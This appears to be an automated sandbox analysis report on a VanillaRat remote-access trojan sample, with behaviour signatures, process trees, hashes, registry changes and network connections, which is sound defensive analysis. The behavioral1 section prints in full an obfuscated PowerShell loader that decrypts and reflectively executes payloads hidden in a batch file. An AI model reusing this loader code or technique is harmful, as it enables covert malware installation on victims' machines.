Analysis Overview
SHA256
e590d9d061fc38da277121abaf50c5d2432fe4cab8eb4fc347687d04c188f34b
Threat Level: Known bad
The file VanillaRat.rar was found to be: Known bad.
Malicious Activity Summary
VanillaRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanillarat family
Vanilla Rat payload
Vanilla Rat payload
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-01 11:02
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win7-20231020-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2508 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
| PID 2508 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
| PID 2508 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2792-5-0x000000001B010000-0x000000001B2F2000-memory.dmp
memory/2792-6-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/2792-7-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2792-8-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
memory/2792-9-0x00000000025E0000-0x0000000002660000-memory.dmp
memory/2792-10-0x00000000025E0000-0x0000000002660000-memory.dmp
memory/2792-11-0x00000000025E0000-0x0000000002660000-memory.dmp
memory/2792-12-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win7-20231023-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a0031000000000061575b58102054656d700000360008000400efbe57570e9161575b582a000000ff010000000002000000000000000000000000000000540065006d007000000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c0031000000000061575c5810204c6f63616c00380008000400efbe57570e9161575c582a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 520031000000000057570f91122041707044617461003c0008000400efbe57570e9157570f912a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000016000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c003100000000005757e696100041646d696e00380008000400efbe57570e915757e6962a0000002e000000000004000000000000000000000000000000410064006d0069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 = 5a0031000000000061575b58102056414e494c4c7e310000420008000400efbe61575b5861575b582a000000ec4f0100000008000000000000000000000000000000560061006e0069006c006c006100520061007400000018000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 740031000000000057570e911100557365727300600008000400efbeee3a851a57570e912a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0 = 4a0031000000000061575b5810204d61696e0000360008000400efbe61575b5861575b582a0000000156010000000a0000000000000000000000000000004d00610069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0\0 = 520031000000000061576e581020436c69656e7473003c0008000400efbe61575b5861576e582a0000003d5c010000000600000000000000000000000000000043006c00690065006e0074007300000016000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2736 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 2736 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 2736 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 2736 wrote to memory of 3020 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | C:\Windows\SysWOW64\explorer.exe |
| PID 3008 wrote to memory of 2320 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe |
| PID 3008 wrote to memory of 2320 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe |
| PID 3008 wrote to memory of 2320 | N/A | C:\Windows\explorer.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.116:1604 | tcp |
Files
memory/2736-0-0x0000000000E50000-0x0000000001018000-memory.dmp
memory/2736-1-0x0000000074C10000-0x00000000752FE000-memory.dmp
memory/2736-2-0x00000000004D0000-0x0000000000510000-memory.dmp
memory/2736-3-0x0000000005170000-0x0000000005250000-memory.dmp
memory/2736-4-0x00000000004D0000-0x0000000000510000-memory.dmp
memory/2736-5-0x0000000074C10000-0x00000000752FE000-memory.dmp
memory/2736-6-0x00000000004D0000-0x0000000000510000-memory.dmp
memory/2736-7-0x00000000088B0000-0x00000000089CC000-memory.dmp
memory/3008-9-0x00000000039B0000-0x00000000039B1000-memory.dmp
memory/3008-10-0x0000000003A00000-0x0000000003A10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe
| MD5 | b947f78e5905e2017cfaf7a463be882c |
| SHA1 | cdb9805af6ffb487e1d02e052de5da7cb6e31bd2 |
| SHA256 | 5e53ce7883322159f67519a50c33a9e749743e2019b62d8f5662857e66467ab9 |
| SHA512 | b9bbde6720f34be1dfdd29f22eff8fe38a66dea1492bad10ead85bcb0058cc2e795ff3f64b07947e47516ab211f855a66c767ea643962e6ffb4242f2babf0ffc |
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\Clients\.exe
| MD5 | b947f78e5905e2017cfaf7a463be882c |
| SHA1 | cdb9805af6ffb487e1d02e052de5da7cb6e31bd2 |
| SHA256 | 5e53ce7883322159f67519a50c33a9e749743e2019b62d8f5662857e66467ab9 |
| SHA512 | b9bbde6720f34be1dfdd29f22eff8fe38a66dea1492bad10ead85bcb0058cc2e795ff3f64b07947e47516ab211f855a66c767ea643962e6ffb4242f2babf0ffc |
memory/2320-13-0x0000000000DB0000-0x0000000000DD2000-memory.dmp
memory/2320-14-0x000007FEF61E0000-0x000007FEF6BCC000-memory.dmp
memory/2320-15-0x000000001BC30000-0x000000001BCB0000-memory.dmp
memory/3008-16-0x00000000039B0000-0x00000000039B1000-memory.dmp
memory/2320-17-0x000007FEF61E0000-0x000007FEF6BCC000-memory.dmp
memory/2320-18-0x000000001BC30000-0x000000001BCB0000-memory.dmp
memory/2736-19-0x00000000004D0000-0x0000000000510000-memory.dmp
memory/2736-20-0x00000000004D0000-0x0000000000510000-memory.dmp
memory/2320-21-0x000000001BC30000-0x000000001BCB0000-memory.dmp
memory/2320-22-0x000000001BC30000-0x000000001BCB0000-memory.dmp
memory/2320-23-0x000000001BC30000-0x000000001BCB0000-memory.dmp
memory/2736-24-0x000000000A030000-0x000000000A048000-memory.dmp
memory/2320-26-0x000000001BC30000-0x000000001BCB0000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win10v2004-20231023-en
Max time kernel
139s
Max time network
149s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
Files
memory/1524-0-0x0000000074CC0000-0x0000000075470000-memory.dmp
memory/1524-1-0x0000000000ED0000-0x0000000001098000-memory.dmp
memory/1524-2-0x0000000005FC0000-0x0000000006564000-memory.dmp
memory/1524-3-0x0000000005AB0000-0x0000000005B42000-memory.dmp
memory/1524-4-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/1524-5-0x0000000005B70000-0x0000000005B7A000-memory.dmp
memory/1524-6-0x0000000074CC0000-0x0000000075470000-memory.dmp
memory/1524-7-0x0000000007480000-0x0000000007560000-memory.dmp
memory/1524-8-0x0000000007840000-0x00000000079E6000-memory.dmp
memory/1524-9-0x0000000005990000-0x00000000059A0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win7-20231023-en
Max time kernel
172s
Max time network
138s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
